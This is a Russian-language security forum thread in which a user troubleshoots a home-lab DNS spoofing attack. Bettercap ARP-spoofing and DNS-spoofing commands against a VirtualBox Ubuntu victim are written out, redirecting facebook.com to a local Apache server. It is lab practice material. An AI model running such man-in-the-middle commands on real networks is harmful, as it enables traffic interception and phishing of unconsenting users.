• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

DNS spoofing - Bettercap

ED_user

Green Team
04.10.2020
72
9
BIT
0
Пробую в локальной сети реализовать DNS spoofing.

1) В качестве атакующей машины выступает VM Kali linux (подключение сетевой мост - VirtualBox) - Использую bettercap для эксплуатации, ниже приведён перечень команд.

sudo bettercap
arp.spoof.fullduplex true
set arp.spoof.targets 192.168.*.*
arp.spoof on
set dns.spoof.domains *.facebook.com (или любой другой ресурс)
dns.spoof on

2) В качестве жертвы выступает VM Ubuntu (подключение сетевой мост - VirtualBox)
При переходе на домен facebook.com по логике жертва должна перенаправляться на мой ИП адресс Kali linux где развёрнут Apache2 сервер (что в целом видно по логам в Bettercap). Но браузер на машине жертвы не реагирует на перенапровление трафика и постоянно грузиться.

Прошу вашей помощи, т.к на доступных ресурсах не нашёл дельной информации. Из идей у меня 1) Блок на роутере при отравлении ARP таблицы или защита от DNS спуфинга крупных ресурсов по типу Facebook и т.д. Хотя я пробовал сделать подмену домена и на доменах с HTTP , результат тот-же.

Спасибо.
 

ED_user

Green Team
04.10.2020
72
9
BIT
0
Удалось разобраться самостоятельно, методом проб и ошибок + углуюлённый ресёрч. Спасибо, тему можно закрывать.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!